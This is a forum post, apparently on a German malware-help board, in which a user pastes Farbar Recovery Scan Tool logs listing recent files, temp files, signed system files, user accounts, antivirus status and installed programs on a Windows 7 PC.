2016-01-11 15:25 - 2014-08-11 18:01 - 00000000 ____D C:\Users\VadimSch\AppData\Roaming\.minecraft
2016-01-11 13:48 - 2012-07-22 20:52 - 00000000 ____D C:\Users\VadimSch\AppData\Roaming\Get Me Tones
2016-01-11 13:27 - 2014-11-19 11:50 - 00000000 ____D C:\Users\VadimSch\AppData\Local\Avg
2016-01-11 13:22 - 2013-04-08 16:13 - 00000000 ____D C:\Users\VadimSch\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Bohemia Interactive
2016-01-11 11:23 - 2012-04-23 17:26 - 00000000 ____D C:\Users\VadimSch\AppData\Local\CrashDumps
2016-01-11 10:58 - 2013-12-31 16:18 - 00003204 _____ C:\Windows\System32\Tasks\HPCeeScheduleForVadimSch
2016-01-11 10:58 - 2013-12-31 16:18 - 00000344 _____ C:\Windows\Tasks\HPCeeScheduleForVadimSch.job
2016-01-11 09:06 - 2015-10-15 03:18 - 00000000 ____D C:\Users\VadimSch\Documents\Telltale Games
2016-01-11 08:41 - 2012-07-13 23:15 - 00052224 ___SH C:\Users\VadimSch\Thumbs.db
2016-01-10 19:06 - 2014-11-02 23:22 - 00000000 ____D C:\Users\VadimSch\AppData\Roaming\Spotify
2016-01-10 19:06 - 2014-11-02 23:22 - 00000000 ____D C:\Users\VadimSch\AppData\Local\Spotify
2016-01-10 08:18 - 2012-05-06 21:29 - 00000000 ____D C:\ProgramData\Skype
2016-01-09 03:32 - 2014-03-16 11:32 - 00000000 ____D C:\ProgramData\AVG2014
2016-01-09 03:32 - 2013-03-08 11:59 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG
2016-01-09 03:32 - 2012-04-24 13:22 - 00000000 ____D C:\Program Files (x86)\AVG
2016-01-08 15:02 - 2012-05-15 19:46 - 00000132 _____ C:\Users\VadimSch\AppData\Roaming\Adobe PNG Format CS5 Prefs
2016-01-08 02:05 - 2011-12-06 01:43 - 04084906 _____ C:\Windows\system32\perfh007.dat
2016-01-08 02:05 - 2011-12-06 01:43 - 01200610 _____ C:\Windows\system32\perfc007.dat
2016-01-08 02:05 - 2009-07-14 06:13 - 00006248 _____ C:\Windows\system32\PerfStringBackup.INI
2016-01-07 05:22 - 2012-09-25 15:21 - 00000000 ____D C:\Users\VadimSch\Desktop\Müll
2016-01-06 17:40 - 2015-12-08 15:23 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG Zen
2016-01-06 05:35 - 2012-11-08 21:20 - 00000000 ____D C:\Users\VadimSch\AppData\Roaming\TS3Client
2016-01-02 14:47 - 2013-08-31 16:52 - 00003822 _____ C:\Windows\System32\Tasks\Adobe Flash Player Updater
2016-01-02 14:47 - 2012-05-01 09:35 - 00796864 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
2016-01-02 14:47 - 2011-12-06 02:09 - 00142528 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2016-01-02 00:38 - 2012-10-06 23:33 - 00004184 _____ C:\Windows\System32\Tasks\Red Giant Link
2016-01-02 00:37 - 2012-10-06 23:30 - 00000000 ____D C:\Program Files (x86)\Red Giant Link
2016-01-01 14:14 - 2009-07-14 06:08 - 00032632 _____ C:\Windows\Tasks\SCHEDLGU.TXT
2015-12-31 16:00 - 2015-12-07 08:42 - 00000000 ____D C:\Users\VadimSch\Desktop\BILDER
2015-12-30 18:55 - 2015-12-07 03:33 - 00000000 ____D C:\Users\VadimSch\Downloads\FB
2015-12-30 15:11 - 2013-08-24 01:10 - 00000000 ____D C:\ProgramData\Origin
2015-12-29 21:35 - 2015-11-04 15:59 - 00000000 ____D C:\Users\VadimSch\Desktop\world
2015-12-28 17:49 - 2015-02-19 13:46 - 00000000 ____D C:\Users\VadimSch\AppData\Local\Steam
2015-12-27 03:59 - 2015-12-03 05:20 - 00231496 _____ C:\Users\VadimSch\Desktop\1000.veg
2015-12-27 03:58 - 2015-12-03 05:20 - 00231496 _____ C:\Users\VadimSch\Desktop\1000.veg.bak
2015-12-25 21:23 - 2014-03-05 23:29 - 00000000 ____D C:\Users\VadimSch\AppData\Roaming\.minecraft - Kopie
2015-12-25 21:22 - 2014-10-16 23:48 - 00000000 ____D C:\Users\VadimSch\AppData\Roaming\Craften Terminal
2015-12-24 06:29 - 2015-12-04 23:43 - 75206099 _____ C:\Users\VadimSch\Desktop\1000.wmv
2015-12-23 21:34 - 2012-07-05 20:31 - 00000000 ____D C:\Users\VadimSch\AppData\Local\ElevatedDiagnostics
2015-12-18 01:45 - 2015-04-04 21:45 - 00000000 ___SD C:\Windows\SysWOW64\GWX
2015-12-18 01:45 - 2015-04-04 21:45 - 00000000 ___SD C:\Windows\system32\GWX
2015-12-17 01:09 - 2013-08-24 01:10 - 00000000 ____D C:\Program Files (x86)\Origin
2015-12-12 11:21 - 2014-02-02 13:03 - 00000000 ____D C:\Users\VadimSch\AppData\Local\Skype
2015-12-12 11:21 - 2012-05-06 21:29 - 00000000 ___RD C:\Program Files (x86)\Skype
2015-12-12 11:16 - 2014-03-17 14:08 - 00000000 ____D C:\Program Files (x86)\AVG SafeGuard toolbar
2015-12-12 01:58 - 2012-10-27 13:13 - 00000132 _____ C:\Users\VadimSch\AppData\Roaming\Adobe GIF Format CS5 Prefs

==================== Dateien im Wurzelverzeichnis einiger Verzeichnisse =======

2011-12-06 02:18 - 2011-06-10 00:44 - 0002792 _____ () C:\Program Files\HP SimplePass 2011
2012-07-03 03:21 - 2012-07-04 04:43 - 0035840 _____ (inject) C:\Program Files (x86)\java.exe
2015-02-15 18:29 - 2015-01-23 17:57 - 0000226 _____ () C:\Program Files (x86)\update-StrandedDeeep.bat
2015-02-15 18:29 - 2014-05-25 14:38 - 0000732 _____ () C:\Program Files (x86)\visit-www.nosteam.ro.html
2012-10-27 13:13 - 2015-12-12 01:58 - 0000132 _____ () C:\Users\VadimSch\AppData\Roaming\Adobe GIF Format CS5 Prefs
2012-05-15 19:46 - 2016-01-08 15:02 - 0000132 _____ () C:\Users\VadimSch\AppData\Roaming\Adobe PNG Format CS5 Prefs
2014-10-23 12:17 - 2014-10-23 12:17 - 0000034 _____ () C:\Users\VadimSch\AppData\Roaming\AdobeWLCMCache.dat
2013-02-19 21:19 - 2015-11-23 12:57 - 0007872 _____ () C:\Users\VadimSch\AppData\Roaming\wklnhst.dat
2014-03-25 00:03 - 2014-03-25 00:04 - 0001456 _____ () C:\Users\VadimSch\AppData\Local\Adobe Für Web speichern 12.0 Prefs
2012-05-05 21:06 - 2015-10-17 21:44 - 0007168 _____ () C:\Users\VadimSch\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2014-01-11 11:10 - 2014-01-11 11:10 - 0000747 _____ () C:\Users\VadimSch\AppData\Local\recently-used.xbel
2013-12-19 00:09 - 2015-11-06 23:02 - 0007605 _____ () C:\Users\VadimSch\AppData\Local\Resmon.ResmonCfg
2012-09-08 14:11 - 2012-10-14 17:58 - 1145382 _____ () C:\Users\VadimSch\AppData\Local\Tempmusic.ogg
2012-05-24 16:25 - 2012-05-24 16:25 - 0000000 _____ () C:\ProgramData\572b58ac425e104366dce5a68ca00016_c

Einige Dateien in TEMP:
====================
C:\Users\VadimSch\AppData\Local\Temp\2p05vwla.dll
C:\Users\VadimSch\AppData\Local\Temp\Ableton Swapper.exe
C:\Users\VadimSch\AppData\Local\Temp\avguirn_082031720114.exe
C:\Users\VadimSch\AppData\Local\Temp\dlLogic.exe
C:\Users\VadimSch\AppData\Local\Temp\dltr.exe
C:\Users\VadimSch\AppData\Local\Temp\EpsonInkjetDriverDownloader.EXE
C:\Users\VadimSch\AppData\Local\Temp\jansi-32-git-Bukkit-1.7.9-R0.1-10-g8688bd4-b3092jnks.dll
C:\Users\VadimSch\AppData\Local\Temp\jansi-64-1183068587957861509.dll
C:\Users\VadimSch\AppData\Local\Temp\jansi-64-3593852418273907528.dll
C:\Users\VadimSch\AppData\Local\Temp\jansi-64-git-Bukkit-1.6.4-R2.0-21-gcf51e92-b2938jnks.dll
C:\Users\VadimSch\AppData\Local\Temp\jansi-64-git-Bukkit-1.7.2-R0.2-b2974jnks.dll
C:\Users\VadimSch\AppData\Local\Temp\jansi-64-git-Bukkit-1.7.9-R0.1-10-g8688bd4-b3092jnks.dll
C:\Users\VadimSch\AppData\Local\Temp\jansi-64-git-Bukkit-62a2169-1000456169996201291.dll
C:\Users\VadimSch\AppData\Local\Temp\jansi-64-git-Bukkit-62a2169-246792996108380285.dll
C:\Users\VadimSch\AppData\Local\Temp\jansi-64-git-Bukkit-62a2169-2685910179321165608.dll
C:\Users\VadimSch\AppData\Local\Temp\jansi-64-git-Bukkit-62a2169-3925754483656889814.dll
C:\Users\VadimSch\AppData\Local\Temp\jansi-64-git-Bukkit-62a2169-4798921350539596804.dll
C:\Users\VadimSch\AppData\Local\Temp\jansi-64-git-Bukkit-62a2169-5196446297337682147.dll
C:\Users\VadimSch\AppData\Local\Temp\jansi-64-git-Bukkit-62a2169-5858937964392960964.dll
C:\Users\VadimSch\AppData\Local\Temp\jansi-64-git-Bukkit-62a2169-6107350127946113414.dll
C:\Users\VadimSch\AppData\Local\Temp\nvSCPAPI.dll
C:\Users\VadimSch\AppData\Local\Temp\nvSCPAPI64.dll
C:\Users\VadimSch\AppData\Local\Temp\nvStInst.exe
C:\Users\VadimSch\AppData\Local\Temp\SearchProtectionSetup.exe
C:\Users\VadimSch\AppData\Local\Temp\SkypeSetup.exe
C:\Users\VadimSch\AppData\Local\Temp\SMSetup.exe
C:\Users\VadimSch\AppData\Local\Temp\sonarinst.exe
C:\Users\VadimSch\AppData\Local\Temp\sqlite-3.7.2-sqlitejdbc.dll
C:\Users\VadimSch\AppData\Local\Temp\tmbfzpxo.dll
C:\Users\VadimSch\AppData\Local\Temp\tmd_34019867.exe
C:\Users\VadimSch\AppData\Local\Temp\verifier.exe


==================== Bamital & volsnap =================

(Es ist kein automatischer Fix für Dateien vorhanden, die an der Verifikation gescheitert sind.)

C:\Windows\system32\winlogon.exe => Datei ist digital signiert
C:\Windows\system32\wininit.exe => Datei ist digital signiert
C:\Windows\SysWOW64\wininit.exe => Datei ist digital signiert
C:\Windows\explorer.exe => Datei ist digital signiert
C:\Windows\SysWOW64\explorer.exe => Datei ist digital signiert
C:\Windows\system32\svchost.exe => Datei ist digital signiert
C:\Windows\SysWOW64\svchost.exe => Datei ist digital signiert
C:\Windows\system32\services.exe => Datei ist digital signiert
C:\Windows\system32\User32.dll => Datei ist digital signiert
C:\Windows\SysWOW64\User32.dll => Datei ist digital signiert
C:\Windows\system32\userinit.exe => Datei ist digital signiert
C:\Windows\SysWOW64\userinit.exe => Datei ist digital signiert
C:\Windows\system32\rpcss.dll => Datei ist digital signiert
C:\Windows\system32\dnsapi.dll => Datei ist digital signiert
C:\Windows\SysWOW64\dnsapi.dll => Datei ist digital signiert
C:\Windows\system32\Drivers\volsnap.sys => Datei ist digital signiert


LastRegBack: 2016-01-11 17:40

==================== Ende von FRST.txt ============================


EisTeeMC 11.01.2016 22:11

Und hier die Addition.txt:
Code:

Zusätzliches Untersuchungsergebnis von Farbar Recovery Scan Tool (x64) Version:10-01-2015 01
durchgeführt von VadimSch (2016-01-11 22:04:39)
Gestartet von C:\Users\VadimSch\Downloads\INTERNET
Windows 7 Home Premium Service Pack 1 (X64) (2012-04-23 15:30:19)
Start-Modus: Normal
==========================================================


==================== Konten: =============================

Administrator (S-1-5-21-3405180731-3880776032-2862364969-500 - Administrator - Disabled)
Gast (S-1-5-21-3405180731-3880776032-2862364969-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-3405180731-3880776032-2862364969-1002 - Limited - Enabled)
VadimSch (S-1-5-21-3405180731-3880776032-2862364969-1001 - Administrator - Enabled) => C:\Users\VadimSch

==================== Sicherheits-Center ========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)

AV: AVG AntiVirus Free Edition (Enabled - Out of date) {4D41356F-32AD-7C42-C820-63775EE4F413}
AS: Windows Defender (Enabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: AVG AntiVirus Free Edition (Enabled - Out of date) {F620D48B-1497-73CC-F290-58052563BEAE}

==================== Installierte Programme ======================

(Nur Adware-Programme mit dem Zusatz "Hidden" können in die Fixlist aufgenommen werden, um sie sichtbar zu machen. Die Adware-Programme sollten manuell deinstalliert werden.)

Ableton Live 9 Lite (HKLM-x32\...\{C3049563-951A-4ECA-B626-AF4F9F8A058F}) (Version: 9.0.0.0 - Ableton)
Ableton Live 9 Suite (HKLM-x32\...\{3573AD96-0B2F-4D56-BD66-2370C0F4EA99}) (Version: 9.0.0.0 - Ableton)
Adobe After Effects CS5.5 (HKLM-x32\...\{CB04D8E1-7B9C-4F35-B2E2-E87CBE520805}) (Version: 10.5.1 - Adobe Systems Incorporated)
Adobe After Effects CS5.5 Third Party Content (HKLM-x32\...\{BE9C28A5-2098-466E-9F52-1AE9DA155E4F}) (Version: 10.5.1 - Adobe Systems Incorporated)
Adobe Community Help (HKLM-x32\...\chc.4875E02D9FB21EE389F73B8D1702B320485DF8CE.1) (Version: 3.4.980 - Adobe Systems Incorporated.)
Adobe Flash Player 20 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 20.0.0.270 - Adobe Systems Incorporated)
Adobe Flash Player 20 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 20.0.0.267 - Adobe Systems Incorporated)
Adobe Illustrator CC 2014 (HKLM-x32\...\{2B4B4082-8043-4646-8334-B0A29E641211}) (Version: 18.1.0 - Adobe Systems Incorporated)
Adobe Media Player (HKLM-x32\...\com.adobe.amp.4875E02D9FB21EE389F73B8D1702B320485DF8CE.1) (Version: 1.8 - Adobe Systems Incorporated)
Adobe Photoshop CS5 (HKLM-x32\...\{15FEDA5F-141C-4127-8D7E-B962D1742728}) (Version: 12.0 - Adobe Systems Incorporated)
Adobe Reader XI (11.0.13) - Deutsch (HKLM-x32\...\{AC76BA86-7AD7-1031-7B44-AB0000000001}) (Version: 11.0.13 - Adobe Systems Incorporated)
Adobe Story (HKLM-x32\...\com.adobe.AdobeStory.4875E02D9FB21EE389F73B8D1702B320485DF8CE.1) (Version: 1.0.571 - Adobe Systems Incorporated)
Ampu-Tea (HKLM-x32\...\Steam App 289090) (Version:  - ProjectorGames)
Apple Application Support (HKLM-x32\...\{78002155-F025-4070-85B3-7C0453561701}) (Version: 3.0.6 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{6AF2AC2A-3532-43FD-9F4D-BDC9C0D724C7}) (Version: 7.1.2.6 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)
Arma 2 (HKLM-x32\...\Steam App 33910) (Version:  - Bohemia Interactive)
ArmA 2 Free Uninstall (HKLM-x32\...\ArmA 2) (Version:  - )
Arma 2: DayZ Mod (HKLM-x32\...\Steam App 224580) (Version:  - Bohemia Interactive)
Arma 2: Operation Arrowhead (HKLM-x32\...\Steam App 33930) (Version:  - Bohemia Interactive)
AuthenTec TrueAPI (Version: 1.3.0.116 - AuthenTec, Inc.) Hidden
AVG (HKLM\...\AvgZen) (Version: 1.31.1.48846 - AVG Technologies)
AVG (Version: 16.31.7356 - AVG Technologies) Hidden
AVG 2014 (Version: 14.0.4336 - AVG Technologies) Hidden
AVG 2016 (Version: 16.0.4489 - AVG Technologies) Hidden
AVG Protection (HKLM\...\AVG) (Version: 2016.31.7356 - AVG Technologies)
AVG SafeGuard toolbar (HKLM-x32\...\AVG SafeGuard toolbar) (Version: 19.1.0.285 - AVG Technologies)
AVG Zen (Version: 1.31.9 - AVG Technologies) Hidden
Batman: Arkham Asylum GOTY Edition (HKLM-x32\...\Steam App 35140) (Version:  - Rocksteady Studios)
Battlefield 3™ (HKLM-x32\...\{76285C16-411A-488A-BCE3-C83CB933D8CF}) (Version: 1.6.0.0 - Electronic Arts)
Battlelog Web Plugins (HKLM-x32\...\Battlelog Web Plugins) (Version: 2.6.2 - EA Digital Illusions CE AB)
Call of Duty - Modern Warfare 2 (HKLM-x32\...\{55608E11-B0F3-4C62-B8D7-7D9AC883FEB7}_is1) (Version:  - )
Call of Duty 2 (HKLM-x32\...\Steam App 2630) (Version:  - Infinity Ward)
Call of Duty 4: Modern Warfare (HKLM-x32\...\Steam App 7940) (Version:  - Infinity Ward)
Call of Duty(R) - World at War(TM) (HKLM-x32\...\InstallShield_{D80A6A73-E58A-4673-AFF5-F12D7110661F}) (Version: 1.0 - Activision)
Call of Duty(R) - World at War(TM) (x32 Version: 1.0 - Activision) Hidden
Call of Duty(R) 2 (HKLM-x32\...\InstallShield_{D0A05794-48C2-4424-A15A-9F20FCFDD374}) (Version: 1.3 - Activision)
Call of Duty(R) 2 (x32 Version: 1.2 - Activision) Hidden
Call of Duty(R) 2 Patch 1.3 (x32 Version: 1.3 - ) Hidden
Call of Duty(R) 4 - Modern Warfare(TM) (HKLM-x32\...\InstallShield_{E48469CC-635E-4FD5-A122-1497C286D217}) (Version: 1.7 - Activision)
Call of Duty(R) 4 - Modern Warfare(TM) (x32 Version: 1.00.0000 - Activision) Hidden
Call of Duty(R) 4 - Modern Warfare(TM) 1.4 Patch (x32 Version:  - ) Hidden
Call of Duty(R) 4 - Modern Warfare(TM) 1.4 Patch (x32 Version: 1.4 - Activision) Hidden
Call of Duty(R) 4 - Modern Warfare(TM) 1.5 Multiplayer Patch (x32 Version:  - ) Hidden
Call of Duty(R) 4 - Modern Warfare(TM) 1.5 Patch (x32 Version: 1.5 - Activision) Hidden
Call of Duty(R) 4 - Modern Warfare(TM) 1.6 Patch (x32 Version:  - ) Hidden
Call of Duty(R) 4 - Modern Warfare(TM) 1.6 Patch (x32 Version: 1.6 - Activision) Hidden
Call of Duty(R) 4 - Modern Warfare(TM) 1.7 Patch (x32 Version:  - ) Hidden
Call of Duty(R) 4 - Modern Warfare(TM) 1.7 Patch (x32 Version: 1.7 - Activision) Hidden
Call of Duty: Advanced Warfare - Multiplayer (HKLM-x32\...\Steam App 209660) (Version:  - Sledgehammer Games)
Call of Duty: Advanced Warfare (HKLM-x32\...\Steam App 209650) (Version:  - Sledgehammer Games)
Call of Duty: Black Ops - Multiplayer (HKLM-x32\...\Steam App 42710) (Version:  - Treyarch)
Call of Duty: Black Ops (HKLM-x32\...\Steam App 42700) (Version:  - Treyarch)
Call of Duty: Black Ops II - Multiplayer (HKLM-x32\...\Steam App 202990) (Version:  - )
Call of Duty: Black Ops II - Zombies (HKLM-x32\...\Steam App 212910) (Version:  - )
Call of Duty: Black Ops II (HKLM-x32\...\Steam App 202970) (Version:  - )
Call of Duty: Black Ops III (HKLM-x32\...\Steam App 311210) (Version:  - Treyarch)
Call of Duty: Black Ops III Beta (HKLM-x32\...\Steam App 388520) (Version:  - Treyarch)
Call of Duty: Ghosts - Multiplayer (HKLM-x32\...\Steam App 209170) (Version:  - )
Call of Duty: Ghosts (HKLM-x32\...\Steam App 209160) (Version:  - Infinity Ward)
Call of Duty: Modern Warfare 2 - Multiplayer (HKLM-x32\...\Steam App 10190) (Version:  - Infinity Ward)
Call of Duty: Modern Warfare 2 (HKLM-x32\...\Steam App 10180) (Version:  - Infinity Ward)
Call of Duty: Modern Warfare 3 - Multiplayer (HKLM-x32\...\Steam App 42690) (Version:  - Infinity Ward)
Call of Duty: Modern Warfare 3 (HKLM-x32\...\Steam App 42680) (Version:  - Infinity Ward)
Card City Nights (HKLM-x32\...\Steam App 271820) (Version:  - Ludosity)
Chrome Remote Desktop Host (HKLM-x32\...\{CDF9E1C8-4B97-4F8B-A848-7DD0E8BEB89F}) (Version: 47.0.2526.18 - Google Inc.)
Cinema 4D version R12 (HKLM-x32\...\{7D9D8134-9FA3-4FFF-ADA1-BF609F29997A}_is1) (Version: R12 - Salat Production)
Counter-Strike: Source (HKLM-x32\...\Steam App 240) (Version:  - Valve)
Craften Terminal 4.2 (HKLM-x32\...\{4e7c3936-7c06-4ef0-928b-c5d92f372578}_is1) (Version: 4.2 - Craften.de)
Cross Fire En (HKLM-x32\...\Cross Fire_is1) (Version:  - Z8Games.com)
Crysis (HKLM-x32\...\InstallShield_{E5B51BA5-ED45-4DAA-AE51-9E5DAF2171FC}) (Version: 1.00.0000 - Electronic Arts)
Crysis (x32 Version: 1.00.0000 - Electronic Arts) Hidden
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
DAEMON Tools Lite (HKLM-x32\...\DAEMON Tools Lite) (Version: 4.49.1.0356 - Disc Soft Ltd)
Dino D-Day (HKLM-x32\...\Steam App 70000) (Version:  - 800 North and Digital Ranch)
doPDF 7.3 printer (HKLM\...\doPDF 7 printer_is1) (Version: 7.3.393 - Softland)
Dxtory 2.0.104 (HKLM-x32\...\Dxtory2.0_is1) (Version: 2.0.104 - Dxtory Software)
Edna & Harvey: Harvey's New Eyes (HKLM-x32\...\Steam App 219910) (Version:  - Daedalic Entertainment)
Edna & Harvey: The Breakout (HKLM-x32\...\Steam App 255320) (Version:  - Daedalic Entertainment)
Enigmatis: The Ghosts of Maple Creek (HKLM-x32\...\Steam App 284750) (Version:  - Artifex Mundi sp. z o.o.)
Far Cry 4 (HKLM-x32\...\RmFyQ3J5NA==_is1) (Version: 1 - )
FileZilla Client 3.6.0.2 (HKLM-x32\...\FileZilla Client) (Version: 3.6.0.2 - FileZilla Project)
FMW 1 (Version: 1.42.1 - AVG Technologies) Hidden
foobar2000 v1.3.8 (HKLM-x32\...\foobar2000) (Version: 1.3.8 - Peter Pawlowski)
Fraps (remove only) (HKLM-x32\...\Fraps) (Version:  - )
Free Alarm Clock 3.1.0 (HKLM-x32\...\{8ED5A2F1-338F-4608-8AF7-BCD1ADC1E1F7}_is1) (Version: 3.1 - Comfort Software Group)
Free Audio Converter version 5.0.61.805 (HKLM-x32\...\Free Audio Converter_is1) (Version: 5.0.61.805 - DVDVideoSoft Ltd.)
Free MP4 Video Converter version 5.0.58.415 (HKLM-x32\...\Free MP4 Video Converter_is1) (Version: 5.0.58.415 - DVDVideoSoft Ltd.)
Free YouTube Download version 3.2.51.1215 (HKLM-x32\...\Free YouTube Download_is1) (Version: 3.2.51.1215 - DVDVideoSoft Ltd.)
Free YouTube to MP3 Converter version 3.12.46.923 (HKLM-x32\...\Free YouTube to MP3 Converter_is1) (Version: 3.12.46.923 - DVDVideoSoft Ltd.)
Garry's Mod (HKLM-x32\...\Steam App 4000) (Version:  - Facepunch Studios)
Git version 2.5.3 (HKLM\...\Git_is1) (Version: 2.5.3 - The Git Development Community)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 47.0.2526.106 - Google Inc.)
Google Update Helper (x32 Version: 1.3.22.5 - Google Inc.) Hidden
Google Update Helper (x32 Version: 1.3.29.1 - Google Inc.) Hidden
GS Supporter 1.80 (HKLM-x32\...\{5F189DF5-2D05-472B-9091-84D9848AE48B}{e9f32388}) (Version:  - Verified Publisher) <==== ACHTUNG
Hotfix für Microsoft Visual Basic 2010 Express - DEU (KB2635973) (HKLM-x32\...\{CCAC7E52-ECCE-3C4D-B1BE-BC2ACF1C1C0E}.KB2635973) (Version: 1 - Microsoft Corporation)
HP LinkUp (HKLM-x32\...\{DB3147AB-4024-4773-8EC0-A1FE5B44933D}) (Version: 2.01.028 - Hewlett-Packard)
HP Odometer (HKLM-x32\...\{B8AC1A89-FFD1-4F97-8051-E505A160F562}) (Version: 2.10.0000 - Hewlett-Packard)
HP Setup (HKLM-x32\...\{D35B72B6-F0E4-462B-BDEB-E08032B3B681}) (Version: 8.7.4747.3786 - Hewlett-Packard Company)
HP Setup Manager (HKLM-x32\...\{AE856388-AFAD-4753-81DF-D96B19D0A17C}) (Version: 1.1.13880.3792 - Hewlett-Packard Company)
HP SimplePass PE 2011 (HKLM-x32\...\{00FF4EB6-6AAC-4E9D-A60A-8F388691BB27}) (Version: 5.3.0.194 - Hewlett-Packard)
HP Support Information (HKLM-x32\...\{7F2A11F4-EAE8-4325-83EC-E3E99F85169E}) (Version: 10.1.1000 - Hewlett-Packard)
HP Update (HKLM-x32\...\{DE77FE3F-A33D-499A-87AD-5FC406617B40}) (Version: 5.002.003.003 - Hewlett-Packard)
HP Vision Hardware Diagnostics (HKLM\...\{D79A02E9-6713-4335-9668-AAC7474C0C0E}) (Version: 2.9.0.0 - Hewlett-Packard)
ibb & obb (HKLM-x32\...\Steam App 95400) (Version:  - Sparpweed)
IcoFX 1.6.4 (HKLM-x32\...\IcoFX_is1) (Version:  - )
Intel(R) Driver Update Utility 2.0 (x32 Version: 2.0.0.29 - Intel) Hidden
Intel(R) Identity Protection Technology 1.1.2.0 (HKLM-x32\...\{C01A86F5-56E7-101F-9BC9-E3F1025EB779}) (Version: 1.1.2.0 - Intel Corporation)
Intel(R) Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 7.0.0.1144 - Intel Corporation)
Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 9.17.10.3517 - Intel Corporation)
Intel(R) SDK for OpenCL - CPU Only Runtime Package (HKLM-x32\...\{FCB3772C-B7D0-4933-B1A9-3707EBACC573}) (Version: 2.0.0.37149 - Intel Corporation)
Intel® Chipsatz-Gerätesoftware (x32 Version: 10.0.13 - Intel(R) Corporation) Hidden
Intel® Driver Update Utility (HKLM-x32\...\{8409c4f7-2340-4933-a304-5d37db4fb48b}) (Version: 2.0.0.29 - Intel)
IrfanView (remove only) (HKLM-x32\...\IrfanView) (Version: 4.37 - Irfan Skiljan)
iTunes (HKLM\...\{77DE5105-D05E-448C-96CB-7FA381903753}) (Version: 11.3.1.2 - Apple Inc.)
Java 7 Update 11 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83217011FF}) (Version: 7.0.110 - Oracle)
Java(TM) 7 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83217000F0}) (Version: 7.0.0 - Oracle)
Java(TM) 7 Update 4 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F86417004FF}) (Version: 7.0.40 - Oracle)
JavaFX 2.1.1 (HKLM-x32\...\{1111706F-666A-4037-7777-211328764D10}) (Version: 2.1.1 - Oracle Corporation)
Junk Mail filter update (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Left 4 Dead 2 (HKLM-x32\...\Steam App 550) (Version:  - Valve)
Logitech Gaming Software 8.70 (HKLM\...\Logitech Gaming Software) (Version: 8.70.315 - Logitech Inc.)
LogMeIn Hamachi (HKLM-x32\...\LogMeIn Hamachi) (Version: 2.2.0.410 - LogMeIn, Inc.)
LogMeIn Hamachi (x32 Version: 2.2.0.410 - LogMeIn, Inc.) Hidden
Magic Bullet Looks Vegas (HKLM-x32\...\Magic Bullet Looks Vegas) (Version:  - )
Magic Bullet Suite 64-bit (HKLM-x32\...\InstallShield_{26055432-339E-4776-803B-F22240B91864}) (Version: 11.1.2 - Red Giant Software)
Magic Bullet Suite 64-bit (Version: 11.1.2 - Red Giant Software) Hidden
Medal of Honor(TM) Multiplayer (HKLM-x32\...\Steam App 47830) (Version:  - Electronic Arts)
Medal of Honor(TM) Single Player (HKLM-x32\...\Steam App 47790) (Version:  - Electronic Arts)
Miasmata (HKLM-x32\...\Steam App 223510) (Version:  - IonFx)
Microsoft .NET Framework 4 Multi-Targeting Pack (HKLM-x32\...\{CFEF48A8-BFB8-3EAC-8BA5-DE4F8AA267CE}) (Version: 4.0.30319 - Microsoft Corporation)
Microsoft .NET Framework 4.5.2 (Deutsch) (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1031) (Version: 4.5.51209 - Microsoft Corporation)
Microsoft .NET Framework 4.5.2 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.51209 - Microsoft Corporation)
Microsoft ASP.NET MVC 4 Runtime (HKLM-x32\...\{3FE312D5-B862-40CE-8E4E-A6D8ABF62736}) (Version: 4.0.40804.0 - Microsoft Corporation)
Microsoft Help Viewer 1.0 (HKLM\...\Microsoft Help Viewer 1.0) (Version: 1.0.30319 - Microsoft Corporation)
Microsoft Help Viewer 1.0 Language Pack - DEU (HKLM\...\Microsoft Help Viewer 1.0 Language Pack - DEU) (Version: 1.0.30319 - Microsoft Corporation)
Microsoft Mathematics (HKLM-x32\...\{4D090F70-6F08-4B60-9357-A1DFD4458F09}) (Version: 4.0 - Microsoft Corporation)
Microsoft Office 2010 (HKLM-x32\...\{95140000-0070-0000-0000-0000000FF1CE}) (Version: 14.0.4763.1000 - Microsoft Corporation)
Microsoft Office Live Add-in 1.5 (HKLM-x32\...\{F40BBEC7-C2A4-4A00-9B24-7A055A2C5262}) (Version: 2.0.4024.1 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.41105.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft SQL Server 2008 R2 Management Objects (HKLM-x32\...\{A106D33E-6B43-42C0-9BFC-D03303261FA7}) (Version: 10.50.1447.4 - Microsoft Corporation)
Microsoft SQL Server Compact 3.5 Design Tools DEU (HKLM-x32\...\{E32260E7-0B10-43C7-9B77-AB9F4184676D}) (Version: 3.5.5386.0 - Microsoft Corporation)
